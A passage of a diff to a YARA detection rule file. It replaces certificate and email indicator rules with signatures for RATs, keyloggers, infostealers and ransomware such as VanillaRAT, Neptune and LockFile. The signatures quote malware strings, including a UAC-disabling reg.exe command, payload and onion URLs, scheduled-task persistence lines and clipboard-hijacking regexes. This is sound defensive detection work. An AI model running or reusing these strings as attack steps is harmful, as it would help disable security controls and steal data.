-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "COSMART LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "69:1e:d2:23:6c:ca:78:d1:80:f2:9d:fd" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $m* ) or ( 11 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3B0E3879266F3Bc98225B390 : FILE
+rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects VanillaRAT"
 		author = "ditekSHen"
-		id = "0b85d4be-678a-51a1-acbc-3e7b94bec804"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8993-L9004"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7882-L7902"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d480534c046e38fe90ee01dc0fa9abf1ade15f879c3770f3df54c6e2c2e1552"
+		logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2eab64a4eaf37060d27620a822df2e1f18ac28f6"
-		importance = 20
+
+	strings:
+		$stub = "VanillaStub." ascii wide
+		$s1 = "Client.Send: " wide
+		$s2 = "Connected to chat" fullword wide
+		$s3 = "GetStoredPasswords" fullword wide
+		$s4 = "Started screen locker." fullword wide
+		$s5 = "[<\\MOUSE>]" fullword wide
+		$s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide
+		$s7 = "record recsound" fullword wide
+		$f1 = "<StartRemoteDestkop>d__" ascii
+		$f2 = "<ConnectLoop>d__" ascii
+		$f3 = "<Scan0>k__" ascii
+		$f4 = "<RemoteShellActive>k__" ascii
+		$f5 = "KillClient" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangzhou Yueju Apparel Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "3b:0e:38:79:26:6f:3b:c9:82:25:b3:90" )
+		uint16( 0 ) == 0x5a4d and ( ( $stub and ( 2 of ( $s* ) or 2 of ( $f* ) ) ) or 6 of ( $s* ) or all of ( $f* ) )
 }
-rule DITEKSHEN_INDICATOR_JAVA_Packed_Allatori
+rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE
 {
 	meta:
-		description = "Detects files packed with Allatori Java Obfuscator"
+		description = "Detects SectopRAT"
 		author = "ditekSHen"
-		id = "16b9f455-ba73-5f09-9822-8349c53fa965"
-		date = "2023-08-29"
-		modified = "2023-08-29"
+		id = "d6594834-24d7-5e86-84b5-5a7920e7bc89"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L113-L121"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7904-L7929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ac48a573eb9d9fffe38d09993ff062f308edb07b8a7498e332cc3eb501d48db7"
+		logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822"
 		score = 75
 		quality = 75
-		tags = ""
-		importance = 20
+		tags = "FILE"
 
 	strings:
-		$s1 = "# Obfuscation by Allatori Obfuscator" ascii wide
+		$s1 = "\\\\.\\root\\cimv2:Win32_Process" wide
+		$s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide
+		$s3 = "^.*(?=Windows)" fullword wide
+		$s4 = "C:\\Windows\\System32\\cmd.exe" wide
+		$s5 = "C:\\Windows\\explorer.exe" wide
+		$s6 = "Disabling IE protection" wide
+		$s7 = "stream started succces" wide
+		$b1 = "/C start Firefox" wide
+		$b2 = "/C start chrome" wide
+		$b3 = "/C start iexplore" wide
+		$m1 = "DefWindowProc" fullword ascii
+		$m2 = "AuthStream" fullword ascii
+		$m3 = "KillBrowsers" fullword ascii
+		$m4 = "GetAllNetworkInterfaces" fullword ascii
+		$m5 = "EnumDisplayDevices" fullword ascii
+		$m6 = "RemoteClient.Packets" fullword ascii
+		$m7 = "IServerPacket" fullword ascii
+		$m8 = "keybd_event" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 2 of ( $b* ) ) or all of ( $s* ) or ( all of ( $b* ) and ( 4 of ( $s* ) or 5 of ( $m* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_EXE_Python_Byte_Compiled : FILE
+rule DITEKSHEN_MALWARE_Win_Neptune : FILE
 {
 	meta:
-		description = "Detects python-byte compiled executables"
+		description = "Detects Neptune keylogger / infostealer"
 		author = "ditekSHen"
-		id = "04ae604c-6176-54cf-98e9-4386e52420f8"
-		date = "2023-08-29"
-		modified = "2023-08-29"
+		id = "0f619bea-f00b-5078-95a4-83306e3e87b4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L211-L220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7931-L7953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "212d525509a4d8fb7f1b5efa929526c8758549bfdb8591c88ce602315e6b3147"
+		logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		importance = 20
 
 	strings:
-		$s1 = "b64decode" ascii
-		$s2 = "decompress" ascii
+		$x1 = "your keylogger has been freshly installed on" wide
+		$x2 = "Attached is a screenshot of the victim" wide
+		$x3 = "color: rgb(2, 84, 138);'>Project Neptune</span><br>" wide
+		$x4 = ">{Monitor Everything}</span><br><br>" wide
+		$x5 = "[First Run] Neptune" wide
+		$x6 = "Neptune - " wide
+		$s1 = "Melt" fullword wide
+		$s2 = "Hide" fullword wide
+		$s3 = "SDDate+" fullword wide
+		$s4 = "DelOff+" fullword wide
+		$s5 = "MsgFalse+" fullword wide
+		$s6 = "Clipboard:" fullword wide
+		$s7 = "information is valid and working!" wide
+		$s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide
+		$s9 = "http://www.exampleserver.com/directfile.exe" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x0a0df303 and filesize < 5KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_MSI_EXE2MSI : FILE
+rule DITEKSHEN_MALWARE_Win_Tomiris : FILE
 {
 	meta:
-		description = "Detects executables converted to .MSI packages using a free online converter."
+		description = "Detects Tomiris"
 		author = "ditekSHen"
-		id = "039df7b6-e4bf-5537-ae5b-f2168044e77e"
-		date = "2023-08-29"
-		modified = "2023-08-29"
+		id = "86efd4fb-3c76-504e-b367-132aee59e09a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L222-L233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7955-L7978"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "afd48b54766600805ae1aeef13b11de4ca160ea1f96419a4090ab9dae55fa4cd"
+		logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "930061-930063"
-		snort3_sid = "930022"
-		importance = 20
 
 	strings:
-		$winin = "Windows Installer" ascii
-		$title = "Exe to msi converter free" ascii
+		$f1 = "main.workPath" ascii
+		$f2 = "main.selfName" ascii
+		$f3 = "main.infoServerAddr" ascii
+		$f4 = "main.configFileName" ascii
+		$s1 = "C:/Projects/go/src/Tomiris/main.go" ascii
+		$s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii
+		$s3 = "C:\\GO\\go1.16.2" ascii
+		$s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii
+		$s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii
+		$s6 = "write /TR \" Value addr= alloc base  code= ctxt: curg= free  goid  jobs= list= m->p=" ascii
+		$t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii
+		$t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii
+		$t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii
+		$t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii
+		$r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
+		$r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii
 
 	condition:
-		uint32( 0 ) == 0xe011cfd0 and ( $winin and $title )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $f* ) and 3 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or ( 4 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or 12 of them )
 }
-rule DITEKSHEN_INDICATOR_PY_Packed_Pyminifier : FILE
+rule DITEKSHEN_MALWARE_Win_Jennlog : FILE
 {
 	meta:
-		description = "Detects python code potentially obfuscated using PyMinifier"
+		description = "Detects JennLog loader"
 		author = "ditekSHen"
-		id = "a111c116-a2b3-5689-8d44-221adf37e932"
-		date = "2023-08-29"
-		modified = "2023-08-29"
+		id = "38f8cd13-f157-5cce-bf04-80c29d254144"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_packed.yar#L331-L339"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7980-L7996"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c7e916906d4654215de6d12e1bff790f24bcf69e97a7e5314a2a057a91b135a3"
+		logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		importance = 20
 
 	strings:
-		$s1 = "exec(lzma.decompress(base64.b64decode("
+		$x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide
+		$x2 = "https://fkpageintheworld342.com" fullword wide
+		$s1 = "ExecuteInstalledNodeAndDelete" fullword ascii
+		$s2 = "ProcessExsist" fullword ascii
+		$s3 = "helloworld.Certificate.txt" fullword wide
+		$s4 = "ASCII85 encoded data should begin with '" fullword wide
+		$s5 = "] WinRE config file path: C:\\" ascii
+		$s6 = "] Parameters: configWinDir: NULL" ascii
+		$s7 = "] Update enhanced config info is enabled." ascii
 
 	condition:
-		( uint32( 0 ) == 0x6f706d69 or uint16( 0 ) == 0x2123 or uint16( 0 ) == 0x0a0d or uint16( 0 ) == 0x5a4d ) and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) or ( all of ( $x* ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Bazarloader : FILE
+rule DITEKSHEN_MALWARE_Win_Lockfile : FILE
 {
 	meta:
-		description = "Detects Bazar executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "94b814e3-56c2-5cdb-9335-c92eea8ec668"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects LockFile ransomware"
+		author = "ditekSHen"
+		id = "762ac376-43ff-56d2-b279-2879ce6d8542"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L11-L21"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7998-L8014"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fd47a1d996c78a6efc144f0fe0a28951c34becab3101e7d25acc980bb6b9f8ce"
+		logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293"
 		score = 75
 		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "skarabeyllc@gmail.com" ascii wide nocase
-		$s2 = "admin@intell-it.ru" ascii wide nocase
-		$s3 = "support@pro-kon.ru" ascii wide
+		$x1 = "LOCKFILE" fullword ascii
+		$x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii
+		$s1 = "</key>" fullword ascii
+		$s2 = "<computername>%s</computername>" fullword ascii
+		$s3 = "<blocknum>%d</blocknum>" fullword ascii
+		$s4 = "%s\\%s-%s-%d%s" fullword ascii
+		$s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide
+		$m1 = "<title>LOCKFILE</title>" ascii wide nocase
+		$m2 = "<hta:application id=LOCKFILE applicationName=LOCKFILE" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 1 of ( $m* ) ) ) or ( 1 of ( $m* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Qakbot : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Foggyweb : FILE
 {
 	meta:
-		description = "Detects QakBot executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "24ad36b2-5022-5f72-b01c-fbb64da20f34"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Attempt on hunting FoggyWeb"
+		author = "ditekSHen"
+		id = "429827f7-2ccf-5c13-ac0d-1fd8b35a6740"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L23-L37"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8016-L8032"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7a38069b3b553cba1a789dac706638382dae5bb748b0c10ef50138879767b6dd"
-		score = 75
-		quality = 61
+		logic_hash = "d868501bc52ad7787d9e99927dd61e9ad9e2132f02348fc71e64666bfc0c9e15"
+		score = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "hutter.s94@yahoo.com" ascii wide nocase
-		$s2 = "andrej.vrear@aol.com" ascii wide nocase
-		$s3 = "klaus.pedersen@aol.com" ascii wide nocase
-		$s4 = "a.spendl@aol.com" ascii wide nocase
-		$s5 = "mjemec@aol.com" ascii wide nocase
-		$s6 = "robert.sijanec@yahoo.com" ascii wide nocase
-		$s7 = "mitja.vidovi@aol.com" ascii wide nocase
+		$u1 = "/adfs/portal/images/theme/light01/" ascii wide
+		$u2 = "/adfs/services/trust/2005/samlmixed/upload" ascii wide
+		$s1 = "ProcessGetRequest" ascii wide
+		$s2 = "ProcessPostRequest" ascii wide
+		$s3 = "UrlGetFileNames" ascii wide
+		$s4 = "GetWebpImage" ascii wide
+		$s5 = "GetWebpHeader" ascii wide
+		$s6 = "ExecuteAssemblyRoutine" ascii wide
+		$s7 = "ExecuteBinary" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Amadey : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Apostle
 {
 	meta:
-		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "f9abbf1d-2077-52a8-bfb0-df3732649624"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Attempt on hunting new variants of Apostle"
+		author = "ditekSHen"
+		id = "31d15111-6935-5a77-ae9a-6bee16c1d2f6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L39-L47"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8034-L8043"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3df3fe67835f76e51743b1b4fa2cbc48277d82689c2fc27457b4d7d820e56e43"
-		score = 75
+		logic_hash = "9acab5dadee0760431376075450f54bbb32ebed10dc928db91a44d069afc1576"
+		score = 50
 		quality = 73
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "tochka.director@gmail.com" ascii wide nocase
+		$x1 = "://t.me/x4ran" ascii wide nocase
+		$x2 = "43JuFUyzfcKQwTzCTHpQoA8uLGtbwFBLyeeXoYEEU5dZLhLT1cZJDk4cytjcgQT7kdjSerJqpEp2gUcH91bjLcoq2bqik3j" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_UNK01 : FILE
+
+rule DITEKSHEN_MALWARE_Win_HUNT_Ghostemperor_Remotecontrolpayload : FILE
 {
 	meta:
-		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "56e83bfb-e17d-5d27-87fa-e275cc540148"
-		date = "2024-01-23"
-		modified = "2024-01-23"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L49-L58"
+		description = "Attempt on hunting GhostEmperor Stage 4 Remote Control Payload"
+		author = "ditekSHen"
+		id = "d30a2aad-8bd6-5291-a31d-7dade250e57e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8045-L8052"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d85461f74186fcabcbf7f2bc1dce06b0012c504cf3235a6fc3e1499dc6f8a3ee"
-		score = 75
-		quality = 73
+		logic_hash = "dabce4e0add0d05b4efd8e7540e4f14767c7b5fab361bd731234dd9dd844c658"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "37d08a64868c35c5bae8f5155cc669486590951ea80dd9da61ec38defb89a146"
-
-	strings:
-		$s1 = "etienne@tetracerous.br" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 2 and pe.exports ( "1" ) and pe.exports ( "__acrt_iob_func" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockergoga
+rule DITEKSHEN_MALWARE_Win_Unicorn : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with LockerGoga ransomware"
-		author = "ditekShen"
-		id = "ff257dae-d09b-52b3-93ca-68a560231b0d"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Unicorn infostealer"
+		author = "ditekSHen"
+		id = "7cc8298d-abbd-5dda-bbd4-8b061095c367"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L60-L80"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8077-L8107"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3474f92d935dda0d4c3b11b6934aede69ed949c8ba4d196bfe320476d39ac36"
+		logic_hash = "c4150b213c0dd88c87eb81e3ad455d8f658a57b0998bc6e394c5afac9423d9f2"
 		score = 75
-		quality = 49
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "abbschevis@protonmail.com" nocase ascii wide
-		$s2 = "aperywsqaroci@o2.pl" nocase ascii wide
-		$s3 = "asuxidoruraep1999@o2.pl" nocase ascii wide
-		$s4 = "dharmaparrack@protonmail.com" nocase ascii wide
-		$s5 = "ijuqodisunovib98@o2.pl" nocase ascii wide
-		$s6 = "mayarchenot@protonmail.com" nocase ascii wide
-		$s7 = "mikllimiteds@gmail.com0" nocase ascii wide
-		$s8 = "phanthavongsaneveyah@protonmail.com" nocase ascii wide
-		$s9 = "qicifomuejijika@o2.pl" nocase ascii wide
-		$s10 = "rezawyreedipi1998@o2.pl" nocase ascii wide
-		$s11 = "sayanwalsworth96@protonmail.com" nocase ascii wide
-		$s12 = "suzumcpherson@protonmail.com" nocase ascii wide
-		$s13 = "wyattpettigrew8922555@mail.com" nocase ascii wide
+		$x1 = "WinHTTP Downloader/1.0" fullword wide
+		$x2 = "[CTRL + %c]" fullword wide
+		$x3 = "\\UnicornLog.txt" fullword wide
+		$x4 = "/*INITIALIZED*/" fullword wide
+		$s1 = { 2f 00 63 00 20 00 22 00 43 00 4f 00 50 00 59 00
+               20 00 2f 00 59 00 20 00 2f 00 42 00 20 00 22 00
+               25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00
+               22 00 00 00 63 00 6d 00 64 00 2e 00 65 00 78 00
+               65 }
+		$s2 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00
+               2e 00 65 00 78 00 65 00 00 00 00 00 25 00 73 00
+               20 00 22 00 25 00 73 00 22 00 2c 00 25 00 68 00
+               73 }
+		$s3 = "%*[^]]%c%n" fullword ascii
+		$s4 = "file://%s%s%s" fullword ascii
+		$s5 = "%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s6 = "regex_start_injects" fullword ascii
+		$s7 = "DLEXEC" fullword ascii
+		$s8 = "^((((3|1)[A-Za-z0-9]{33}))(\\s|$)|(bc1q)[A-Za-z0-9]{38}(\\s|$))" fullword ascii
+		$s9 = "^(0x)?[A-Za-z0-9]{40}(\\s|$)" fullword ascii
+		$s10 = "clipRegex" fullword ascii
+		$s11 = "%s?k=%s&src=clip&id=%s" fullword ascii
+		$s12 = "http://izuw6rclbgl2lwsh.onion/o.php" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 8 of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Goldenaxe
+rule DITEKSHEN_MALWARE_Win_Spectre : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with GoldenAxe ransomware"
-		author = "ditekShen"
-		id = "cd6486eb-742f-50fb-bd99-c5d778886477"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Spectre infostealer"
+		author = "ditekSHen"
+		id = "43b32900-8dff-5a95-bcff-d6bd17703476"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L82-L91"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8109-L8124"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2540da85880dc08b51a2d096cefd8ed3cb14ccd171b71b434ccf26e7c5f1b54b"
+		logic_hash = "ee041928ab5010fd5a06538f9a7cf9c72e44903fdb05f13b12362af0b326fd6f"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
+		snort_sid = "920233-920234"
 
 	strings:
-		$s1 = "xxback@keemail.me" nocase ascii wide
-		$s2 = "darkusmbackup@protonmail.com" nocase ascii wide
+		$s1 = "\\../../../json.h" wide
+		$s2 = "static_cast<std::size_t>(index) < kCachedPowers.size()" fullword wide
+		$s3 = " cmd.exe" fullword wide
+		$s4 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
+		$h1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" fullword wide
+		$h2 = "----974767299852498929531610575" ascii wide
+		$h3 = "Content-Disposition: form-data; name=\"file\"; filename=\"" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $h* ) ) or ( all of ( $h* ) and 2 of ( $s* ) ) ) ) or ( 6 of them )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Getcrypt
+rule DITEKSHEN_MALWARE_Win_HUNT_Blackbyte : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with GetCrypt ransomware"
-		author = "ditekShen"
-		id = "b5e31968-e626-5fbb-8bfe-942b48737367"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Attempt on hunting BlackByte ransomware"
+		author = "ditekSHen"
+		id = "c07e9b83-3bbf-52c9-b9fa-ca03f285a906"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L93-L106"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8126-L8139"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "401f4e69235873adc271f8861912ec17daaa71a798c83df8cc3a9b88520708c9"
-		score = 75
-		quality = 63
-		tags = ""
+		logic_hash = "4ceb71e42b888522c183af7e180bae47510fc7aa60a713aa83ffc2c98c03466f"
+		score = 50
+		quality = 57
+		tags = "FILE"
 
 	strings:
-		$s1 = "getcrypt@cock.li" nocase ascii wide
-		$s2 = "cryptget@tutanota.com" nocase ascii wide
-		$s3 = "cryptget@tutanota.com" nocase ascii wide
-		$s4 = "offtitan@pm.me" nocase ascii wide
-		$s5 = "offtitan@cock.li" nocase ascii wide
-		$s6 = "un42@protonmail.com" nocase ascii wide
+		$s1 = "WalkDirAndEncrypt" ascii wide nocase
+		$s2 = "FileEncrypt" ascii wide nocase
+		$s3 = "BlackByte." ascii wide nocase
+		$s4 = "EnumerateDirAndEncrypt" ascii wide nocase
+		$s5 = "Dismount-DiskImage" ascii wide nocase
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" ascii wide nocase
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cryptomix
+rule DITEKSHEN_MALWARE_Win_Dlinjector05 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with CryptoMix ransomware"
-		author = "ditekShen"
-		id = "7e623d06-36e8-576d-b261-d562eccf549b"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects downloader / injector (NiceProcess)"
+		author = "ditekSHen"
+		id = "857eb13b-a882-5326-b7aa-4d2fcd0b6425"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
